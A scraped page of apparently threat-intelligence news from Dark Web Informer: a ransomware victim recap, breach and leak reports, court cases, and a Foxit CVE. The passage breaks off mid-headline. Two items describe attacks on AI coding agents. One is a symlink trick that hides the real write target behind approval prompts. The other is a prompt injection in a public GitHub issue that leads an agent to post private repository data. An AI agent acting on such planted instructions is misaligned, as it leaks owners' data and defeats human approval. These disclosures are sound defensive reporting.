victim claims, threat groups, and related activity. [View Feed](https://darkwebinformer.com/ransomware-feed) ### Socials Follow Dark Web Informer across all official platforms. [Follow](https://darkwebinformer.com/socials) --- 34 claims 5 groups 18 countries Ransomware Recap # July 11, 2026 12:01 AM – 11:59 PM UTC 34Claims 5Groups 18Countries The GentlemenMost Active Group Activity ✕ Count A–Z Expand Collapse \= country not specified No matches found. ### The Gentlemen 19 - Royal Foods - Ferretería Scopazzo - Fortray - Martin Cava - Aveiro Constructors Limited - Triquesta - Vicenzi Group - Energon - Open Options - INTERNET AG - Crossroads Medical Management - Pharma Wholesale - Welders Supply Equipment Rentals - VASBE - Gene Codes Forensics - Lopes Law - Carita - BDO Greece - Dash Door Glass ### LockBit 5.0 9 - bancrofteng.com - magna.com.do - giesdl.de - jshotels.com - hotel-bourse.com - abianchini.es - comtri.de - mediaservicemaastricht.nl - ravagnan.com ### Qilin 4 - Century Equities - Retelit SpA PIVA - Carolina Agri-Power - Allied Plumbing & Heating ### DragonForce 1 - Access Equipment Hire ### CMD Organization 1 - Golden Star Resources ### Dutch Police Suspect Local Accomplices in Odido Breach Affecting 6.2 Million Customers URL: https://darkwebinformer.com/dutch-police-suspect-local-accomplices-in-odido-breach-affecting-6-2-million-customers/ Last updated: 2026-07-10T17:44:32.000Z Dutch police say they have uncovered strong indications that local criminals were involved in the cyberattack against telecommunications provider Odido, which exposed personal information belonging to millions of customers. The [Dutch National Police investigation](https://www.politie.nl/nieuws/2026/juli/8/onderzoek-naar-hack-odido-wijst-op-mogelijke-betrokkenheid-nederlanders.html) centers partly on a telephone call made shortly before the February 2026 breach. During the call, a Dutch-speaking man allegedly posed as an Odido IT employee while speaking with the company’s customer service department. Police said Odido was subsequently misled through phishing, after which the attackers gained access and stole customer information. Authorities are still working to identify the caller and any other people involved in the operation. The breach began after attackers accessed an Odido customer contact system on February 7\. The company disclosed the incident on February 12 and later said it affected approximately [6.2 million customers](https://www.bleepingcomputer.com/news/security/police-suspects-dutch-hackers-were-involved-in-odido-breach/). Depending on the customer, the exposed information may have included names, residential addresses, mobile numbers, email addresses, customer numbers, dates of birth, IBAN bank account numbers, and limited identification document details such as passport or driver’s license numbers and validity dates. Odido said call records, location data, billing information, identity document scans, and Mijn Odido account passwords were not exposed during the attack. During the early stages of the investigation, Dutch police successfully took [multiple servers used to distribute the stolen data](https://therecord.media/dutch-police-suspect-dutch-accomplice-in-odido-cyberattack) offline. Investigators said they have preserved evidence at several points throughout the case and are continuing to analyze the traces left behind by the attackers. The ShinyHunters extortion group claimed responsibility for the breach and later published an [88GB archive containing more than 15 million records](https://www.bleepingcomputer.com/news/security/police-suspects-dutch-hackers-were-involved-in-odido-breach/). However, Odido has not officially attributed the attack to ShinyHunters, and Dutch authorities have not publicly confirmed that the group was responsible. Police believe the perpetrators may have discussed the attack online or within their personal circles. Investigators are asking people within the cybercriminal community or others with knowledge of the operation to provide information. Authorities have also urged the Dutch-speaking caller to come forward voluntarily. Police said they may eventually [release a recording of the caller’s voice](https://therecord.media/dutch-police-suspect-dutch-accomplice-in-odido-cyberattack) to the public if it becomes necessary to identify him. The investigation is expected to continue for several more months. Dutch police and prosecutors said the ultimate outcome remains uncertain, but the newly identified local connection could help investigators move closer to identifying those responsible. ### French Baby-Products Marketplace Bebeboutik Allegedly Breached, Seller Portal Database of 500,000 Rows Leaked URL: https://darkwebinformer.com/french-baby-products-marketplace-bebeboutik-allegedly-breached-seller-portal-database-of-500-000-rows-leaked/ Last updated: 2026-07-10T17:23:44.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France E-commerce / Retail Free Download ## French Baby-Products Marketplace Bebeboutik Allegedly Breached, Seller Portal Database of 500,000 Rows Leaked A threat actor using the alias **ChimeraZ** claims to be leaking a database from the seller portal of **Bebeboutik** (sales.bebeboutik.fr), a French private-sales marketplace for baby and children's products. The portal lets merchants manage their product catalogs, orders, inventory, pricing, and sales. The listing describes an SQL dump of around **500,000 rows**, totaling 1.4GB across 1,890 files, offered as a free download. No sample was included, so the exact fields are not confirmed, but order and sales data of this kind can include merchant and customer information. The claim is **unverified**. Severity MEDIUM Data\~500K rows Size1.4 GB Country![France flag](https://flagcdn.com/w40/fr.png)France ActorChimeraZ ### ▣Post details TargetBebeboutik seller portal (sales.bebeboutik.fr) Country![France flag](https://flagcdn.com/w40/fr.png)France SectorE-commerce / Retail ClaimSQL dump, \~500,000 rows Size1.4GB, 1,890 files AccessFree download ObservedJul 10, 2026 ActorChimeraZ ### !Allegedly included - \~500,000 rows (SQL) - Merchant / seller data - Product catalog - Order records - Inventory data - Pricing data - Sales data - 1.4GB across 1,890 files ### ◱Screenshot [ ![Bebeboutik seller portal French marketplace data breach forum post screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/098347562873965987263598726359872359876.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/098347562873965987263598726359872359876.png) ### ⚠Potential impact A leak of a marketplace seller portal can expose commercially sensitive information, including merchant details, product catalogs, pricing, inventory, and sales figures, which competitors or fraudsters could exploit. If the order and sales tables include buyer information, the exposure would also reach customers of the marketplace. Because the full dump is offered as a free download across multiple mirrors, any exposed data should be treated as widely circulating. No sample was provided, so the precise contents are unconfirmed. The claim is unverified. ### iStatus Unverified This is a free-download leak posted with multiple mirror links; none of the download links or the seller's contact details are reproduced here. This is the same alias seen in other recent French leaks. The claim is **unverified** and Bebeboutik has not publicly addressed it. Want everything on this breach, including the unblurred screenshots? **Paid subscribers** get the full claim details, breach URL, and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### French Business School PPA Breached, Nearly 294,000 Records of Students, Alumni, and Prospects Leaked URL: https://darkwebinformer.com/french-business-school-ppa-breached-nearly-294-000-records-of-students-alumni-and-prospects-leaked/ Last updated: 2026-07-10T17:11:23.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Education ## French Business School PPA Breached, Nearly 294,000 Records of Students, Alumni, and Prospects Leaked A threat actor using the alias **84City** has posted an SQL dump they attribute to **PPA Business School**, described as one of the largest private higher-education groups in France, offering preparatory programs and bachelor's degrees across art, design, digital, communication, and business. Dated July 10, 2026, the dump is a single personnes table listed at **293,967 rows**, said to merge prospects, applicants, enrolled students, and alumni into one list. Per the description and sample, each record includes name, email, phone, home address, date of birth, nationality, student ID, school, class, year, and enrollment status. The claim is **unverified**. Severity HIGH Data293,967 records AccessPoints-gated Country![France flag](https://flagcdn.com/w40/fr.png)France Actor84City ### ▣Post details TargetPPA Business School Country![France flag](https://flagcdn.com/w40/fr.png)France SectorEducation ClaimSQL dump, 293,967 rows (personnes) DataNames, contact, addresses, DOB Dump dateJul 10, 2026 ObservedJul 10, 2026 Actor84City ### !Allegedly included - 293,967 person records - Names & emails - Phone numbers - Home addresses - Dates of birth - Nationality - Student IDs & class/school - Enrollment status ### ◱Screenshot [ ![PPA Business School French higher education data breach forum post screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/92397856928736598723659872365897235987.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/92397856928736598723659872365897235987.png) ### ⚠Potential impact Merging prospects, applicants, students, and alumni into one list ties nearly 294,000 people's names to their email addresses, phone numbers, home addresses, dates of birth, and nationality. That combination is a ready-made resource for identity theft, targeted phishing, and fraud, and the inclusion of home addresses and dates of birth adds physical-privacy and impersonation risk. Because the list spans everyone who ever interacted with the school, the exposure reaches well beyond current students. No sample records, identifiers, or contact details are reproduced here. The claim is unverified. ### iStatus Unverified This is a data-leak post; the download is gated behind forum points. No sample records, identifiers, or personal data are reproduced here. This is the same alias behind a recent leak of another French school. The claim is **unverified** and PPA Business School has not publicly addressed it. Want everything on this breach, including the unblurred screenshots? **Paid subscribers** get the full claim details, breach URL, and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Former Ransomware Negotiator Sentenced for Helping BlackCat/ALPHV Extort U.S. Victims URL: https://darkwebinformer.com/former-ransomware-negotiator-sentenced-for-helping-blackcat-alphv-extort-u-s-victims/ Last updated: 2026-07-10T15:36:20.000Z A former ransomware negotiator from Florida has been sentenced to federal prison for helping BlackCat/ALPHV ransomware actors extort U.S. victims while he was supposed to be helping victims respond to attacks. The Justice Department announced that [Angelo Martino, 41, of Land O’Lakes, Florida](https://www.justice.gov/opa/pr/florida-ransomware-negotiator-who-extorted-and-attacked-multiple-us-victims-sentenced-prison), was sentenced to 70 months in prison for his role in conspiring with BlackCat/ALPHV actors to extort multiple victims. According to DOJ, Martino was formerly employed as a ransomware negotiator at a U.S.-based cyber incident response company. Prosecutors said he abused that role by providing BlackCat actors with [confidential information about victims’ negotiating positions and strategies](https://www.justice.gov/opa/pr/florida-ransomware-negotiator-who-extorted-and-attacked-multiple-us-victims-sentenced-prison), allowing the ransomware group to push for larger payments. The scheme allegedly began in April 2023 and involved five ransomware victims. DOJ said Martino was paid by BlackCat attackers to help them maximize ransom payments from clients his employer had been hired to represent. Martino also conspired with two other former cybersecurity professionals, [Kevin Martin of Texas and Ryan Goldberg of Georgia](https://www.justice.gov/opa/pr/florida-ransomware-negotiator-who-extorted-and-attacked-multiple-us-victims-sentenced-prison), to deploy BlackCat ransomware against additional U.S. victims between April and November 2023. In one case, the group successfully extorted a victim for approximately [$1.2 million in Bitcoin](https://www.justice.gov/opa/pr/florida-ransomware-negotiator-who-extorted-and-attacked-multiple-us-victims-sentenced-prison). DOJ said the men split their share of the ransom three ways and laundered the proceeds through various methods. Martino pleaded guilty on April 14 to conspiring to interfere with interstate commerce through extortion. Martin and Goldberg were separately sentenced to [48 months in prison](https://www.justice.gov/opa/pr/florida-ransomware-negotiator-who-extorted-and-attacked-multiple-us-victims-sentenced-prison) on May 1. Law enforcement has seized more than [$10 million in assets](https://www.justice.gov/opa/pr/florida-ransomware-negotiator-who-extorted-and-attacked-multiple-us-victims-sentenced-prison) from Martino, including digital currency, vehicles, a food truck, and a luxury fishing boat. A restitution hearing is scheduled for September 17. The case follows DOJ’s earlier disruption of BlackCat in December 2023, when the FBI developed a decryption tool that helped hundreds of victims recover systems and saved victims an estimated [$99 million in ransom payments](https://www.justice.gov/opa/pr/florida-ransomware-negotiator-who-extorted-and-attacked-multiple-us-victims-sentenced-prison). DOJ said the case is part of [Operation Riptide](https://www.justice.gov/opa/pr/florida-ransomware-negotiator-who-extorted-and-attacked-multiple-us-victims-sentenced-prison), an ongoing FBI campaign targeting cybercriminals, infrastructure, and financial networks behind ransomware, cyber-enabled crime, and fraud. The case is a reminder that ransomware risk does not only come from external attackers. Insider access, negotiation data, incident response communications, and victim strategy details can become extremely valuable when abused by someone trusted inside the response process. ### Federal Prisoner Charged With Stealing $290K in Forfeited Cryptocurrency URL: https://darkwebinformer.com/federal-prisoner-charged-with-stealing-290k-in-forfeited-cryptocurrency/ Last updated: 2026-07-09T20:52:28.000Z A man already serving a federal prison sentence has been charged with allegedly stealing and laundering cryptocurrency that had been forfeited to the United States. The Justice Department announced that [Rossen G. Iossifov, a 53-year-old Bulgarian national](https://www.justice.gov/opa/pr/man-serving-federal-prison-sentence-charged-theft-forfeited-cryptocurrency), made an initial appearance in federal court in the Eastern District of Kentucky on charges tied to the alleged removal and transfer of forfeited cryptocurrency. According to DOJ, Iossifov is accused of helping move approximately [$290,000 in cryptocurrency](https://www.justice.gov/opa/pr/man-serving-federal-prison-sentence-charged-theft-forfeited-cryptocurrency) that had already been seized and ordered forfeited to the United States after his 2021 conviction. Prosecutors allege that in January 2024, while Iossifov was serving a [111-month prison sentence](https://www.justice.gov/opa/pr/man-serving-federal-prison-sentence-charged-theft-forfeited-cryptocurrency), he conspired to transfer the forfeited cryptocurrency through multiple exchanges and illicit mixing services to prevent the United States from taking possession of the funds. The earlier case involved an online auction fraud scheme targeting U.S. victims. Evidence submitted at trial and sentencing showed that Iossifov had laundered nearly [$5 million in cryptocurrency](https://www.justice.gov/opa/pr/man-serving-federal-prison-sentence-charged-theft-forfeited-cryptocurrency) in less than three years. As part of that prior case, he was ordered to pay more than [$2.6 million in restitution](https://www.justice.gov/opa/pr/man-serving-federal-prison-sentence-charged-theft-forfeited-cryptocurrency) to victims and to forfeit the cryptocurrency now at issue in the new indictment. DOJ said Iossifov is charged with removal of property to prevent seizure and conspiracy to commit money laundering. If convicted, he faces a [maximum penalty of 25 years in prison](https://www.justice.gov/opa/pr/man-serving-federal-prison-sentence-charged-theft-forfeited-cryptocurrency). ### GhostApproval Flaw Exposes Trust Boundary Weakness in Major AI Coding Assistants URL: https://darkwebinformer.com/ghostapproval-flaw-exposes-trust-boundary-weakness-in-major-ai-coding-assistants/ Last updated: 2026-07-09T19:39:17.000Z Security researchers at Wiz have disclosed GhostApproval, a vulnerability pattern affecting several major AI coding assistants and exposing a trust-boundary problem between developers, AI agents, and the local filesystem. The issue affects six widely used AI coding tools: [Amazon Q Developer, Anthropic Claude Code, Augment, Cursor, Google Antigravity, and Windsurf](https://www.wiz.io/blog/ghostapproval-a-trust-boundary-gap-in-ai-coding-assistants). Wiz described GhostApproval as a category-level blind spot in how agentic coding tools handle symbolic links, or symlinks. At the center of the flaw is a classic Unix-era security problem. A malicious repository can include a file that appears to be a normal project file, but is actually a symlink pointing outside the workspace. When an AI coding assistant is asked to follow project instructions, it may write to the visible project filename while the operating system resolves the write to the real target outside the workspace. In Wiz’s example, a harmless-looking config file could point to a sensitive local file such as [SSH authorized\_keys](https://www.wiz.io/blog/ghostapproval-a-trust-boundary-gap-in-ai-coding-assistants). If the agent writes an attacker-controlled key to that target, the attacker could gain persistent passwordless access to the developer’s machine. The deeper issue is not only that symlinks were followed. Wiz found that in several cases, the agent or tool recognized the dangerous target internally, but the approval prompt shown to the user did not reveal the real destination. As The Register noted, the user might approve what looks like a normal local edit while the agent writes to a sensitive file outside the project workspace. That turns “human-in-the-loop” approval into a weak control. If the user is not shown the real path or security impact, the approval prompt becomes more of a rubber stamp than informed consent. Vendor responses varied. Wiz said [AWS, Cursor, and Google fixed the issue](https://www.wiz.io/blog/ghostapproval-a-trust-boundary-gap-in-ai-coding-assistants), with AWS assigning CVE-2026-12958 for Amazon Q Developer and Cursor assigning CVE-2026-50549\. Google fixed the issue in Antigravity and was still assessing CVE issuance at the time of disclosure. Anthropic disputed the initial report as outside its threat model, arguing that the user had already trusted the directory and approved the file operation. However, current Claude Code versions now include symlink warnings before writing to sensitive files. According to The Register, Anthropic later said that warning shipped before Wiz submitted the report and was part of proactive hardening. Wiz listed [Augment and Windsurf](https://www.wiz.io/blog/ghostapproval-a-trust-boundary-gap-in-ai-coding-assistants) as still in progress at the time of publication. The Register also reported that there was no indication GhostApproval had been actively exploited in the wild, but the potential impact remains serious because AI coding tools often run with access to source code, credentials, local files, and cloud-connected development environments. For developers and security teams, the takeaway is straightforward: AI coding agents should not be treated as harmless autocomplete. They can read, write, execute, and modify files under the user’s privileges. That makes workspace trust, filesystem boundaries, and approval prompts security-critical controls. Organizations using AI coding assistants should update affected tools, avoid running agents against untrusted repositories, monitor for unexpected writes to sensitive files, and ensure approval prompts show resolved paths, not just the apparent project filename. A prompt that hides the real target is not meaningful consent. ### Thepha District Public Health Office in Thailand Breached, Databases Dumped and Server Access Offered URL: https://darkwebinformer.com/thepha-district-public-health-office-in-thailand-breached-databases-dumped-and-server-access-offered/ Last updated: 2026-07-09T18:32:46.000Z Breach Report ![Thailand flag](https://flagcdn.com/w40/th.png)Thailand Government / Health Live Access Offered ## Thepha District Public Health Office in Thailand Breached, Databases Dumped and Server Access Offered A threat actor using the alias **Monkeydance** claims to have breached the **Thepha District Public Health Office**, a local health authority in Thailand operating under the Ministry of Public Health. Posted on July 9, 2026, the listing offers a full dump described as multiple databases, all files and logs, **1,006 PDF invoices and documents**, and backups dating back to May 2026, totaling around 2GB. A sample indicates the databases include website user accounts with hashed passwords and staff contact details. The actor additionally claims to be offering **live server access** to the compromised system. The claim is **unverified**. Severity HIGH Data\~2GB dump Documents1,006 PDFs Country![Thailand flag](https://flagcdn.com/w40/th.png)Thailand ActorMonkeydance ### ▣Post details TargetThepha District Public Health Office Country![Thailand flag](https://flagcdn.com/w40/th.png)Thailand SectorGovernment / Health ClaimFull dump (DBs, files, logs, docs) DataSite accounts, hashes, documents ExtraLive server access offered ObservedJul 9, 2026 ActorMonkeydance ### !Allegedly included - Multiple database dumps - 1,006 PDF invoices & documents - All files & logs - Backups from May 2026 - Website user accounts - Hashed passwords (staff) - Staff contact details - Live server access (offered) ### ◱Screenshots [ ![Thepha District Public Health Office Thailand data breach forum post screenshot, July 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/978235629783698726598723659872359782.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/978235629783698726598723659872359782.png) [ ![Thepha District Public Health Office Thailand data breach forum post screenshot, July 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/978235629783698726598723659872359783.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/978235629783698726598723659872359783.png) ### ⚠Potential impact A full compromise of a government health office exposes internal databases, administrative documents, and staff credentials, which can enable further intrusion, fraud, and impersonation. The hashed passwords could be cracked to reuse valid accounts, and the offer of live server access means the environment may remain actively compromised rather than merely leaked. The invoice and document set may contain personal and operational information tied to the office's health programs. No sample data, credentials, file listings, links, or access details are reproduced here. The claim is unverified. ### iStatus Unverified This is a data-leak post with downloads gated behind forum points; the actor also advertises paid live access to the server. No sample records, password hashes, file names, links, or access details are reproduced here. The claim is **unverified** and the office has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Norway Says 28 Arrested in Dark Web CSAM Crackdown Tied to Monero Payments URL: https://darkwebinformer.com/norway-arrests-28-in-dark-web-csam-crackdown-tied-to-monero-payments/ Last updated: 2026-07-09T23:54:14.000Z Norway’s National Criminal Investigation Service, known as Kripos, says 28 men have been arrested across seven countries in an international dark web operation tied to Monero payments. According to the official [Kripos announcement](https://www.politiet.no/nyheter-og-presse/kripos/nyhet/2026-07-07/28%5Fpersoner%5Fpagrepet%5Fi%5Finternasjonal%5Fpolitiaksjon), the suspects allegedly used the privacy-focused cryptocurrency Monero to buy access to dark web forums containing child sexual abuse material or other illegal material sexualizing children. The arrests took place in Norway, Sweden, Switzerland, Canada, Czech Republic, Poland, and Germany. Kripos said the operation was carried out in early June and was coordinated with help from [Europol and Eurojust](https://www.politiet.no/nyheter-og-presse/kripos/nyhet/2026-07-07/28%5Fpersoner%5Fpagrepet%5Fi%5Finternasjonal%5Fpolitiaksjon). A key detail in the case is Monero tracing. Kripos said it developed a method in 2025 that makes it possible to trace [Monero use in specific cases](https://cryptobriefing.com/norway-arrests-monero-dark-web-crackdown/). The agency has not disclosed how the method works, but said it was used in this operation to identify people who allegedly paid for access to the forums. Kripos also said investigators identified two suspected sellers of illegal abuse material, neither of whom are located in Norway. Police seized more than [460 items](https://www.politiet.no/nyheter-og-presse/kripos/nyhet/2026-07-07/28%5Fpersoner%5Fpagrepet%5Fi%5Finternasjonal%5Fpolitiaksjon), including electronic devices, storage media, crypto wallets, illegal material, drugs, and large amounts of doping substances. The investigation is still ongoing. Kripos said there are many suspects in the case and that [more arrests are expected](https://cryptobriefing.com/norway-arrests-monero-dark-web-crackdown/), potentially in additional countries. In Norway, two people were identified and one man in his 30s from Trøndelag was arrested. During searches, police also implemented measures to protect [three children who were present](https://www.politiet.no/nyheter-og-presse/kripos/nyhet/2026-07-07/28%5Fpersoner%5Fpagrepet%5Fi%5Finternasjonal%5Fpolitiaksjon). The case is notable because Monero has long been treated by criminals as a more private payment rail than Bitcoin. This does not mean Monero is universally broken or that every transaction can be traced. But the operation shows that law enforcement agencies are continuing to develop targeted methods for investigating privacy coin usage in specific criminal cases. For dark web users relying on privacy coins as a guarantee of anonymity, the message is clear: operational security failures, forum records, payment patterns, device seizures, and investigative coordination can still create an attribution trail. ### French IT School ESGI Breached, Over 26,000 Student Enrollment Records Leaked URL: https://darkwebinformer.com/french-it-school-esgi-breached-over-26-000-student-enrollment-records-leaked/ Last updated: 2026-07-08T19:22:41.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Education ## French IT School ESGI Breached, Over 26,000 Student Enrollment Records Leaked A threat actor using the alias **84City** has posted an SQL dump they attribute to **ESGI** (École Supérieure de Génie Informatique), a private French higher-education school specializing in IT and digital technology, based in Paris with campuses across France. The dump is dated July 8, 2026 and listed as **26,451 rows** from a users table (the post also cites roughly 12,000 records). Per the description and sample, each record contains student enrollment data: full name, email, mobile phone, home address, city and postal code, nationality, class and program, enrollment status and dates, a Geschool ID, and a **school Active Directory login**. The claim is **unverified**. Severity MEDIUM Data26,451 rows AccessPoints-gated Country![France flag](https://flagcdn.com/w40/fr.png)France Actor84City ### ▣Post details TargetESGI (esgi.fr) Country![France flag](https://flagcdn.com/w40/fr.png)France SectorEducation ClaimSQL dump, 26,451 rows (users) DataNames, contact, addresses, AD logins Dump dateJul 8, 2026 ObservedJul 8, 2026 Actor84City ### !Allegedly included - 26,451 rows (users table) - Student full names - Emails & mobile phones - Home addresses & postal codes - Nationality - Class & program details - Enrollment status & dates - School AD login & Geschool ID ### ◱Screenshot [ ![ESGI French IT school student data breach forum post screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/879236589726359876235987263598723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/879236589726359876235987263598723.png) ### ⚠Potential impact The exposed records tie students' names to their email addresses, mobile phone numbers, and home addresses, which enables targeted phishing, identity fraud, and physical-privacy risks. The inclusion of school Active Directory logins is notable, as those institutional usernames could support social-engineering or account-access attempts against the school's systems. No national ID, financial, or password data is described. No sample records, identifiers, or contact details are reproduced here. The claim is unverified. ### iStatus Unverified This is a data-leak post; the download is gated behind forum points. The claim is **unverified** and ESGI has not publicly addressed it. Want everything on this breach, including the unblurred screenshots? **Paid subscribers** get the full claim details, breach URL, and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### AssuranceAmerica Data Breach Exposes Driver’s License Numbers of 6.99 Million People URL: https://darkwebinformer.com/assuranceamerica-data-breach-exposes-drivers-license-numbers-of-6-99-million-people/ Last updated: 2026-07-08T16:35:07.000Z **UPDATE:** Breach notice can be found here: https://www.documentcloud.org/documents/28433184-assuranceamerica-data-breach-notice/ --- U.S. insurance provider AssuranceAmerica has confirmed a data breach affecting nearly 7 million people, exposing personal information and driver’s license numbers. According to [TechCrunch](https://techcrunch.com/2026/07/08/another-massive-data-breach-exposed-millions-of-drivers-license-numbers/), AssuranceAmerica discovered hackers inside its computer systems on March 17, 2026\. The company completed its investigation on June 15 and determined that customer data had been stolen. The breach affected [6.99 million people](https://techcrunch.com/2026/07/08/another-massive-data-breach-exposed-millions-of-drivers-license-numbers/), according to data breach filings cited by TechCrunch from the Indiana and Maine attorney general offices. Notification letters are expected to be sent beginning July 10. The stolen information included names, contact information, and [driver’s license numbers](https://techcrunch.com/2026/07/08/another-massive-data-breach-exposed-millions-of-drivers-license-numbers/). AssuranceAmerica’s breach notice also said the attackers accessed information related to auto insurance policies and accounts, drivers and vehicles, and customer claims. The company did not provide a full breakdown of every data field taken. However, TechCrunch reported that AssuranceAmerica said the attackers [targeted one company employee](https://techcrunch.com/2026/07/08/another-massive-data-breach-exposed-millions-of-drivers-license-numbers/) and that compromised credentials were later disabled. AssuranceAmerica did not disclose exactly how the employee credentials were stolen. TechCrunch noted that similar incidents involving stolen employee credentials have previously been linked to password-stealing malware or compromised software. The scale of the breach makes it one of the largest known exposures of U.S. driver’s license data this year. Driver’s license numbers can be used for identity theft, fraud, impersonation, and account verification abuse, especially when combined with names and contact information. The incident also follows other recent breaches involving identity documents. In June, [Texas officials disclosed](https://techcrunch.com/2026/07/08/another-massive-data-breach-exposed-millions-of-drivers-license-numbers/) that hackers stole information tied to at least 3 million driver’s licenses and passport numbers from the state’s parks and wildlife division. The broader trend is clear: identity documents are becoming a high-value breach target at the same time more services are asking users to upload IDs for verification. Once exposed, driver’s license data cannot be rotated as easily as a password. For organizations handling driver and insurance data, the takeaway is straightforward: employee credential compromise remains a major breach path. Strong phishing-resistant MFA, credential theft detection, endpoint monitoring, session controls, and least-privilege access are critical when a single compromised employee account can expose millions of records. ### Foxit PDF Reader RCE Flaw CVE-2024-30326 Highlights PDF Attack Surface URL: https://darkwebinformer.com/foxit-pdf-reader-rce-flaw-cve-2024-30326-highlights-pdf-attack-surface/ Last updated: 2026-07-08T15:42:05.000Z A remote code execution vulnerability in Foxit PDF Reader, tracked as CVE-2024-30326, highlights the continued risk of malicious PDF files being used as an initial access vector. According to the [Zero Day Initiative advisory](https://www.zerodayinitiative.com/advisories/ZDI-24-313/), CVE-2024-30326 is a Doc Object use-after-free vulnerability affecting Foxit PDF Reader. ZDI assigned the issue a CVSS score of 7.8 and said exploitation requires user interaction, meaning a target must open a malicious file or visit a crafted page. The flaw exists in the way Foxit PDF Reader handles Doc objects. ZDI says the issue stems from failing to validate the existence of an object before performing operations on it, which can allow an attacker to execute code in the context of the current process. Foxit addressed the issue as part of its April 2024 security updates. In its official bulletin, Foxit said [Foxit PDF Reader 2024.2 and Foxit PDF Editor 2024.2](https://www.foxit.com/support/security-bulletins.html) were released for Windows on April 28, 2024, with Foxit PDF Reader 2024.1.0.23997 and earlier listed as affected. The same Foxit bulletin describes a broader set of issues involving use-after-free, out-of-bounds read, and type confusion conditions when parsing certain PDF files or handling Doc, Annotation, Signature, and AcroForm objects. Several of those bugs could be abused for remote code execution or information disclosure. For defenders, the takeaway is simple: PDF readers should be treated as exposed client-side attack surface. Organizations should keep Foxit Reader and Editor updated, restrict unnecessary PDF browser/plugin behavior where possible, and remind users that a PDF attachment can still be a code execution risk. ### GitLost Shows How GitHub AI Agents Can Leak Private Repository Data URL: https://darkwebinformer.com/gitlost-shows-how-github-ai-agents-can-leak-private-repository-data/ Last updated: 2026-07-07T20:01:47.000Z Noma Labs has disclosed GitLost, a prompt injection vulnerability that showed how GitHub’s AI-powered Agentic Workflows could be tricked into leaking private repository data through a public GitHub issue. The issue affects how [GitHub Agentic Workflows](https://noma.security/blog/gitlost-how-we-tricked-githubs-ai-agent-into-leaking-private-repos/) combine GitHub Actions with an AI agent backed by Claude or GitHub Copilot. These workflows allow teams to automate repository tasks through plain-language Markdown instructions, with the agent reading issues, calling tools, accessing repositories, and responding on its own. According to Noma Labs, the attack worked by placing malicious instructions inside the body of a normal-looking [public GitHub issue](https://www.theregister.com/security/2026/07/07/github-ai-agent-leaks-private-repos-when-asked-nicely/5267924). If an organization had configured its agentic workflow with read access to other repositories in the same organization, including private ones, the agent could be manipulated into retrieving private data and posting it as a public comment. The tested workflow triggered when an issue was assigned, read the issue title and body, used an add-comment tool, and had [read access to other repositories](https://noma.security/blog/gitlost-how-we-tricked-githubs-ai-agent-into-leaking-private-repos/) inside the organization. Noma said an attacker did not need stolen credentials, coding skills, or access to the private repositories. They only needed to open an issue in a public repository and wait for the workflow to run. In Noma’s proof of concept, the agent was instructed to fetch README.md contents from multiple repositories, including a private repository named `testlocal`, before posting the retrieved content into the public issue thread. HackRead reported that Noma also published [workflow reproductions and live evidence](https://hackread.com/gitlost-github-ai-agent-leaking-repository-data/) showing the attack path. The finding highlights a major risk with agentic AI systems: user-controlled content can become instruction input. Dark Reading noted that GitLost allowed an unauthenticated attacker to craft a GitHub issue in a public repository and silently pull data from an organization’s private repositories if the agent had access to them. Noma’s key takeaway is that the agent’s context window is also part of the attack surface. Any content the agent reads, including issues, pull requests, comments, or files, can be weaponized if the system fails to separate untrusted user input from trusted instructions. Organizations testing agentic workflows should avoid giving agents broad cross-repository permissions, especially access to private repositories. Agent outputs should also be restricted, reviewed, and prevented from posting sensitive results directly to public issues or comments. For defenders, the lesson is straightforward: treat AI agents like privileged automation. Limit their access, isolate untrusted input, monitor their actions, and assume that anything they can read may become something they can accidentally leak. ### French Medical Platform Follow Data Offered for Sale, Over 2 Million Patient Records Exposed URL: https://darkwebinformer.com/french-medical-platform-follow-fr-data-offered-for-sale-over-2-million-patient-records-exposed/ Last updated: 2026-07-07T17:29:56.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Healthcare Data for Sale ## French Medical Platform Follow Data Offered for 